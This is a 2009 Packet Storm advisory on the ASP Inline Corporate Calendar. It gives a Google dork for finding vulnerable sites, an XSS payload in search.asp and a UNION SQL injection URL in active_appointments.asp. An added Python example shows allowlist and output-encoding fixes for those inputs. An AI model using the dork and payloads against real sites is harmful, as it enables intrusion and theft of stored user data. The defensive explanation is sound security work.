ASP Inline Corporate Calendar XSS / SQL Injection

2009-05-21T00:00:00
ID PACKETSTORM:77722
Type packetstorm
Reporter Bl@ckbe@rd
Modified 2009-05-21T00:00:00

Description

                                        
`
  
  
  
[+] Script : ASP Talk   
  
[+] Exploit Type : Multiple Exploits (SQL injection / cross-site scripting)  
  
[+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id=  
  
[+] Contact : blackbeard-sql A.T hotmail.fr   
  
--//--> Exploit :   
  
1) Cross-site scripting :  
  
http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All  
  
post = <script>alert('Bl@clbe@rD Is Here');</script>  
  
2) Remote SQL injection exploit :  
  
http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users  
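Both issues above come from reflecting a request parameter into HTML (search.asp keyword) and splicing request parameters into an ORDER BY clause (active_appointments.asp sortby/order). The sort column and direction cannot be bound as SQL parameters, so the only sound fix there is an allowlist; the keyword needs output encoding. The following is an added example written for this page in Python rather than the application's classic ASP, not code from the advisory or the vendor; the table and column names other than Event_Title, the hostname and the function names are assumptions.

```python
"""Added example (not part of the advisory): allowlist validation for the
ORDER BY parameters and output encoding for the search keyword, the two
inputs the advisory above shows being injected."""
import html
from urllib.parse import parse_qs, urlsplit

# Columns the calendar page may sort on. Only Event_Title appears in the
# advisory URL; the other names are constructed for this example.
ALLOWED_SORT_COLUMNS = {"Event_Title", "Event_Date", "Event_Location"}
ALLOWED_ORDER = {"ASC", "DESC"}
DEFAULT_SORT = ("Event_Date", "ASC")


class RejectedInput(ValueError):
    """Raised when a sort parameter is not on the allowlist."""


def build_order_by(sortby: str, order: str) -> str:
    """Return an ORDER BY fragment built only from allowlisted tokens.

    Identifiers and keywords cannot be passed as bound parameters, so the
    request values are never copied into the SQL; only a token that
    matches the allowlist exactly is emitted.
    """
    if sortby not in ALLOWED_SORT_COLUMNS:
        raise RejectedInput(f"sortby not allowed: {sortby!r}")
    direction = order.upper()
    if direction not in ALLOWED_ORDER:
        raise RejectedInput(f"order not allowed: {order!r}")
    return f"ORDER BY {sortby} {direction}"


def order_by_or_default(sortby: str, order: str) -> str:
    """Fall back to the default ordering instead of failing the page."""
    try:
        return build_order_by(sortby, order)
    except RejectedInput:
        return build_order_by(*DEFAULT_SORT)


def build_appointments_query(sortby: str, order: str) -> str:
    """Assumed query for active_appointments.asp (table name constructed).
    Row filters would go through bound parameters; ORDER BY is the only
    part assembled from request input, and only via the allowlist."""
    return ("SELECT Event_Title, Event_Date FROM appointments "
            + order_by_or_default(sortby, order))


def render_keyword(keyword: str) -> str:
    """Echo the search keyword into HTML with every metacharacter encoded,
    including quotes, so it can also sit inside an attribute value."""
    return html.escape(keyword, quote=True)


def handle_request(url: str) -> dict:
    """Simulate the hardened pages handling one request URL and return
    the SQL or HTML fragment they would produce."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)

    def first(name: str) -> str:
        return params.get(name, [""])[0]

    if parts.path.endswith("/search.asp"):
        return {"html": render_keyword(first("keyword"))}
    if parts.path.endswith("/active_appointments.asp"):
        return {"sql": build_appointments_query(first("sortby"), first("order"))}
    return {}


if __name__ == "__main__":
    # Constructed requests shaped like the advisory's, against an assumed host.
    for u in (
        "http://calendar.example/cal/search.asp?keyword=<script>alert(1)</script>&SearchIn=All",
        "http://calendar.example/cal/active_appointments.asp?sortby=Event_Title&order=DESC",
        "http://calendar.example/cal/active_appointments.asp?sortby=Event_Title"
        "&order=DESC+union+select+1,2,3+from+users",
    ):
        print(u, "->", handle_request(u))
```

parse_qs decodes the `+` in the advisory URL to a space, so the injected `order` value arrives as `DESC union select 1,2,3 from users`, fails the allowlist, and the query falls back to the default ordering; a legitimate `DESC` passes unchanged.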
  
[peace xD]  
  
  
`